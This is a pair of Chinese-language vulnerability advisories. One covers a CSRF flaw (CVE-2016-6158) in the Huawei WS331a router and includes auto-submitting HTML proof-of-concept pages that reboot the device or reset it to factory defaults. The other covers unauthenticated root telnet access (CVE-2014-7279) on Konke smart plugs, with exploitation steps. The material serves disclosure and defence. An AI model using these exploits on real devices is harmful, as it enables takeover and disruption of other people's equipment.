华为官方:http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160907-01-ws331a-en

CVE-2016-6158:华为WS331a产品管理页面存在CSRF漏洞

一、漏洞摘要

漏洞名称: 华为WS331a产品管理页面存在CSRF漏洞
上报日期: 2016-09-07
漏洞发现者: zixian(me@zixian.org)
产品首页: http://www.huawei.com/
软件链接: http://www.huawei.com/
版本: WS331a-10 V100R001C02B017SP01及之前版本
CVE编号: CVE-2016-6158


二、漏洞概述

华为WS331a 是一款便携无线路由器。
WS331a产品的管理页面中存在一个CSRF漏洞,未经过认证的攻击者可以利用此漏洞发起CSRF攻击。成功利用此漏洞,攻击者可以向受影响设备提交特定请求进而导致设备恢复出厂设置或者重启。 (漏洞编号:HWPSIRT-2016-07078)
此漏洞的CVE编号为:CVE-2016-6158。


三、利用代码

当管理员登陆后,打开如下poc页面,WS331a设备将重启。
poc.html:

<form action="http://192.168.3.1/api/service/reboot.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script>

当管理员登陆后,打开如下poc页面,WS331a设备将恢复初始化配置。设备自动重启后不需要密码即可连接热点,并使用amdin/admin对设备进行管理控制。

<form action="http://192.168.3.1/api/service/restoredefcfg.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script> 


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/20/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6158
华为官方:http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160907-01-ws331a-en

CVE-2014-7279:Konke智能插座非授权访问管理接口漏洞

一、漏洞摘要

漏洞名称: Konke智能插座非授权访问管理接口漏洞
上报日期: 2014-10-29
漏洞发现者: gamehacker(gh@waloudong.org)&zixian(me@zixian.org)
产品首页: http://www.ikonke.com/
软件链接: http://www.ikonke.com/
版本: K
CVE编号: CVE-2014-7279


二、漏洞概述

“Konke”是来自中国的一款智能家居产品(http://www.ikonke.com/),该产品存在安全漏洞导致攻击者可以利用漏洞获取设备管理权限。
Konke智能插座加电启动后会打开23端口,攻击者可以直接使用telnet工具登录23端口,可以不用密码得到root权限。

三、利用代码

1、扫描Konke:可以使用nmap等工具对设备的23端口进行扫描;
2、连接设备:使用telnet连接Konke设备的23端口;
3、获得权限:连接成功即可获得root权限。
k.png
并可以看到设备使用openwrt系统架构,可以使用busybox等工具执行系统命令对设备进行进一步的控制。

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/18/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7279
exploit-db:https://www.exploit-db.com/exploits/35103/